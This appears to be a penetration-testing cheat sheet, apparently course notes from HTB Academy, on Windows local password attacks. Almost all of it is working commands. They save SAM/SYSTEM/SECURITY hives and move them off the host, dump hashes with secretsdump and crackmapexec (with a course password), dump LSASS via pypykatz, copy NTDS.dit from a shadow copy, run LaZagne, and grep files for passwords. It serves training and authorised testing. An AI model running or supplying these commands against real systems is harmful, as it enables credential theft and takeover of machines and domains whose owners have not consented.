Windows Local Password Attacks
Attacking SAM
# Copy Registery Hives
# Admin Priv Needed
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save
# Copy To Local Machine
move sam.save \\<IP\share
# Dump Hashes
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
# Dump SAM Remotly
crackmapexec smb <IP> --local-auth -u bob -p HTB_@cademy_stdnt! --sam
Attacking LSASS
Dumping LSASS
# Finding LSASS PID
tasklist /svc
Get-Process lsass
# Dump .dump file
pypykatz lsa minidump lsass.dmp
Generating UserNames
https://github.com/urbanadventurer/username-anarchy
./username-anarchy -i <usernames.list>
Capturing NTDS.dit
Shadow Copy (Manual)
# Creating Shadow Copy
## Admin privs needed
vssadmin CREATE SHADOW /For=C:
# Copy NTDS from vss
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
CrackMapExec (Automatic & Faster)
crackmapexec smb <ip> -u <user> -p <pass> --ntds
Credential Hunting
Lazagne
Tools: https://github.com/AlessandroZ/LaZagne
# STart Lazagne
start lazagne.exe all
Find Command
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
Last updated